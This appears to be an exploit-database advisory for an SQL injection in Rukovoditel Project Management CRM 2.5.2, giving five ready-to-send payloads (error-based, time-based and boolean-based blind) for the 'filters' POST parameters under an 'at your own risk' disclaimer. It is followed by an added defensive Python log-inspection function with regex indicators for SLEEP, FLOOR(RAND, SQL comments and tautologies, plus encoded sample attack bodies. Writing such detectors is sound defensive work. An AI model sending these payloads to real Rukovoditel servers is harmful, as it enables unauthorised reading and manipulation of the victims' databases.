Exploits / Vulnerability Discovered: 2020-01-16
Type: webapps
Platform: php
This exploit / vulnerability (Rukovoditel Project Management CRM 2.5.2 'filters' SQL injection) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A
# Parameter: filters[1][value] (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm
# Parameter: filters[0][value] (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1
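
For defenders reviewing web server or WAF logs, the following added example (not part of the original advisory, and not Rukovoditel code) parses a form-encoded POST body and flags filters[n][value] fields that show the boolean-based, error-based or time-based patterns listed above. The function name, the indicator list and the sample bodies are constructed for illustration, and the indicators are heuristics rather than a complete rule set.

```python
import re
from urllib.parse import parse_qsl

# Only the parameter family named in the advisory is inspected.
FILTER_VALUE = re.compile(r"^filters\[\d+\]\[value\]$")

# Heuristic indicators (assumed, not exhaustive), one per pattern seen in the payloads.
INDICATORS = [
    ("quote-break", re.compile(r"'")),
    ("sql-comment", re.compile(r"--\s|#|/\*")),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:or|and)\s+(\d+)\s*=\s*\1\b", re.I)),
]

def inspect_body(body):
    """Return [(parameter, [indicator, ...])] for suspicious filters[n][value] fields."""
    findings = []
    # parse_qsl URL-decodes names and values, so encoded payloads are matched too.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if not FILTER_VALUE.match(name):
            continue
        hits = [label for label, rx in INDICATORS if rx.search(value)]
        if hits:
            findings.append((name, hits))
    return findings

# Constructed sample bodies, modelled on the request shape shown in the advisory.
PREFIX = "page=1&filters[0][name]=type&filters[0][value]="
SAMPLES = {
    "benign": PREFIX + "0&filters[1][name]=users_id&filters[1][value]=1",
    "boolean": PREFIX + "-6686%27+OR+4511%3D4511%23&filters[1][name]=users_id&filters[1][value]=1",
    "time": PREFIX + "0&filters[1][name]=users_id"
            "&filters[1][value]=1%27+AND+%28SELECT+1479+FROM+%28SELECT%28SLEEP%285%29%29%29WpOr%29--+kARm",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_body(body))
```

The values shown in the advisory's requests are plain integers, so any hit on these fields is worth reviewing alongside the response time and status of the same request.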